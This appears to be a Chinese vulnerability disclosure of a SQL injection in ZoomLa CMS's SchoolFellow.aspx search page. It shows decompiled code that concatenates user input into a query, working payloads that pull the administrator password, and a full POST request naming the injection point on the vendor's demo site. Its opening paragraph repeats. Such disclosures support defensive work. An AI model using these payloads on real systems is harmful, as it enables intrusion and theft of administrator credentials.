### 简要描述: http://www.zoomla.cn/down/2242.shtml 20140725更新. ### 详细说明: 前台注册(新版集成了N多功能)并登陆,会员中心处,http://demo.zoomla.cn/User/UserZone/School/SchoolFellow.aspx,查找同学处存在注入. ``` /User/UserZone/School/SchoolFellow.aspx <%@ page language="C#" autoeventwireup="true" inherits="User_UserZone_School_SchoolFellow, App_Web_tgw2vs0x" enableEventValidation="false" viewStateEncryptionMode="Never" %> ``` 反编译App_Web_tgw2vs0x.dll ``` App_Web_tgw2vs0x.User_UserZone_School_SchoolFellow protected void Button1_Click(object sender, EventArgs e) { int num2; DataTable table = this.st.Select_ByValue(" * ", " UserID in (select UserID from ZL_UserBase where TrueName like '%" + this.txtName.Text + "%') ", ""); ``` search型注入. z%' and @@version>0 and '%'=' z%' and (select top 1 AdminPassword from ZL_Manager)>0 and '%'='(管理员密码) http://demo.zoomla.cn/User/UserZone/School/SchoolFellow.aspx POST:...
### 简要描述: http://www.zoomla.cn/down/2242.shtml 20140725更新. ### 详细说明: 前台注册(新版集成了N多功能)并登陆,会员中心处,http://demo.zoomla.cn/User/UserZone/School/SchoolFellow.aspx,查找同学处存在注入. ``` /User/UserZone/School/SchoolFellow.aspx <%@ page language="C#" autoeventwireup="true" inherits="User_UserZone_School_SchoolFellow, App_Web_tgw2vs0x" enableEventValidation="false" viewStateEncryptionMode="Never" %> ``` 反编译App_Web_tgw2vs0x.dll ``` App_Web_tgw2vs0x.User_UserZone_School_SchoolFellow protected void Button1_Click(object sender, EventArgs e) { int num2; DataTable table = this.st.Select_ByValue(" * ", " UserID in (select UserID from ZL_UserBase where TrueName like '%" + this.txtName.Text + "%') ", ""); ``` search型注入. z%' and @@version>0 and '%'=' z%' and (select top 1 AdminPassword from ZL_Manager)>0 and '%'='(管理员密码) http://demo.zoomla.cn/User/UserZone/School/SchoolFellow.aspx POST: __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUKMTE0Nzc4NjkwNw9kFgICAw9kFgZmDw8WAh4EVGV4dAUJ6YCQ5rWqQ01TZGQCBQ9kFgICAQ88KwARAgEQFgAWABYADBQrAABkAg4PEGRkFgBkGAEFCUdyaWRWaWV3MQ9nZAfHrsmckVbLrrqqyYKBUUsyOWBm1AJUg2fMuuagtd6u&txtName=2013*(注入点)&Button1=%E6%9F%A5++%E6%89%BE ### 漏洞证明: [<img src="https://images.seebug.org/upload/201408/02111038c645d622cf5c8d8a8f864d0205ca772d.jpg" alt="080201.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/02111038c645d622cf5c8d8a8f864d0205ca772d.jpg) [<img src="https://images.seebug.org/upload/201408/021110542e8237f2cc2b30f9009002e13c91ea41.jpg" alt="080202.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/021110542e8237f2cc2b30f9009002e13c91ea41.jpg)